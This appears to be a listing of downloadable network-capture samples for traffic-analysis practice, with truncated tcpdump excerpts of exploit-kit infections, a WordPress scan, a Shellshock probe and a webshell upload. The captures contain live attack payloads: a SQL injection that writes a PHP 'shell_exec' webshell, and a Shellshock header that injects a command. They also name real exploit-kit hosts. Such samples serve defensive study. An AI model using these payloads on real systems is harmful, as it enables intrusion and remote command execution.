Angler Exploit Kit EK Deliver Simda Malware Banking Trojan PCAP file download traffic sample

2015-03-27 11:14:44.276370 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 1, win 256, length 0 E..(.A@….O..z”..D..).P.Cy…..P…………. 2015-03-27 11:14:44.283482 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [P.], seq 1:356, ack 1, win 256, length 355: HTTP: GET /closers_retrenchment_delineation/6715645798 HTTP/1.1 E….K@…….z”..D..).P.Cy…..P….;..GET /closers_retrenchment_delineation/6715645798 HTTP/1.1 Accept: text/html, application/xhtml+xml, / Referer: [[[[[[[[[ redacted ]]]]]]]]]] Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Accept-Encoding: gzip, deflate Host: kiyoshi.noahsbootandshoerepair.com Connection: Keep-Alive 2015-03-27 11:14:44.539699 IP 188.138.68.234.80 > 192.168.122.34.49193: Flags [.], ack 356, win 123, length 0 2015-03-27 11:14:46.115369 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 95637, win 256, length 0 E..(..@…….z”..D..).P.C{…5 P…y……… 2015-03-27 11:14:47.983190 IP 192.168.122.34.49193 > […]

Webshell shell.php Command Access SSH Server PCAP Analysis File Download

2018-10-14 12:34:34.199552 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 1:334, ack 1, win 229, options [nop,nop,TS val 769026432 ecr 738855], length 333: HTTP: GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET[‘cmd’]);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22–%20 HTTP/1.1 E…XA@.?……2 ..d…P…f{J.I…..F….. -.i…F’GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET[‘cmd’]);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22–%20 HTTP/1.1 Host: 10.1.2.100 Connection: keep-alive Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0 Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.9.1 2018-10-14 12:34:34.199573 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [.], ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 0 E..4.a@.@… ..d…2.P..{J.I…………… ..F(-.i. 2018-10-14 12:34:34.202294 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 1:996, ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 995: HTTP: HTTP/1.1 200 OK E….b@.@.|. ..d…2.P..{J.I…………… ..F(-.i.HTTP/1.1 200 OK Date: Sun, […]

WPscan WordPress Scan Directory Brute Force PCAP file download Traffic Analysis

2017-06-08 21:59:48.303294 IP 192.168.10.101.42588 > 192.168.10.111.80: Flags [P.], seq 9781:9912, ack 33354, win 105, options [nop,nop,TS val 8431 ecr 1099943], length 131: HTTP: GET /wordpress/_old HTTP/1.1 E…..@.@..M.. e.. o..P………..i……. .. …..GET /wordpress/_old HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: 192.168.10.111 Accept: / 2017-06-08 21:59:48.303330 IP 192.168.10.101.14193 > 192.168.10.111.55: UDP, length 32 E..<“…”….. e.. o7q.7.(1…………………………… 2017-06-08 21:59:48.303429 IP 192.168.10.101.20422 > 192.168.10.111.55: UDP, length 32 E..<“… ….. e.. oO..7.(.|………………………….. 2017-06-08 21:59:48.303527 IP 192.168.10.101.30431 > 192.168.10.111.55: UDP, length 32 E..<“…7….. e.. ov..7.(.b………………………….. 2017-06-08 21:59:48.303556 IP 192.168.10.111.80 > 192.168.10.101.42588: Flags [P.], seq 33354:33807, ack 9912, win 846, options [nop,nop,TS val 1099943 […]

ShellShock Attack PCAP file Download Traffic Analysis Sample

2017-07-26 16:42:16.277036 IP 130.253.1.120.52744 > 204.79.197.200.80: Flags [P.], seq 15800207:15800243, ack 1402349435, win 115, options [nop,nop,TS val 1182121665 ecr 2059156643], length 36: HTTP: GET /cgi-bin/.svn/entries HTTP/1.1 E..X.+@.>.|….x.O…..P….S.'{…s……. Fu..z.<.GET /cgi-bin/.svn/entries HTTP/1.1 2017-07-26 16:42:16.277047 IP 130.253.1.120.52744 > 204.79.197.200.80: Flags [P.], seq 36:148, ack 1, win 115, options [nop,nop,TS val 1182121665 ecr 2059156643], length 112: HTTP E….,@.>.|….x.O…..P….S.'{…s.….. Fu..z.<.Host: db75d9a4f3c95d8a0adffb672c196e96.du.edu User-Agent: () { :; }; /bin/rm /var/www/default/CVE-2014-6271 2017-07-26 16:42:16.277082 IP 61.7.186.197.5507 > 130.253.185.203.23: Flags [S], seq 0, win 65535, length 0 E..(:(….W.=……………….P…e… 2017-07-26 16:42:16.277466 IP 60.196.157.234.47651 > 130.253.130.165.1900: UDP, length 94 E..z..@.0.j”<……..#.l.f..M-SEARCH * HTTP/1.1 HOST: 239.255.255.250:1900 MAN: ssdp:discover MX: 10 ST: ssdp:all . 2017-07-26 […]

RIG Exploit Kit EK Delivers Cerber Ransomware Malware PCAP file download traffic sample

2016-10-18 14:40:36.304404 IP 10.10.18.102.49185 > 195.133.201.132.80: Flags [P.], seq 1:477, ack 1, win 258, length 476: HTTP: GET /?x3qJc7iVLB3LDIU=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJMwNHqpuRQuA60Q6jyLlFdM0ilROKvWBSy7sUUg4T6BgY0Q HTTP/1.1 E….O@…N+ .f…..!.P0.X.]..MP…….GET /?x3qJc7iVLB3LDIU=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJMwNHqpuRQuA60Q6jyLlFdM0ilROKvWBSy7sUUg4T6BgY0Q HTTP/1.1 Accept: text/html, application/xhtml+xml, / Referer: http://www.basket-brabant.be/ Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: add.jamesthorpebourbon.com Connection: Keep-Alive 2016-10-18 14:40:36.504124 IP 195.133.201.132.80 > 10.10.18.102.49185: Flags [.], ack 477, win 237, length 0 E..(.T@.5……. .f.P.!]..M0.Z.P…E+.. 2016-10-18 14:40:37.014717 IP 195.133.201.132.80 > 10.10.18.102.49185: Flags [.], seq 1:1322, ack 477, win 237, length 1321: HTTP: HTTP/1.1 200 OK E..Q.U@.5……. .f.P.!]..M0.Z.P…….HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Tue, 18 Oct 2016 18:40:36 GMT Content-Type: text/html; […]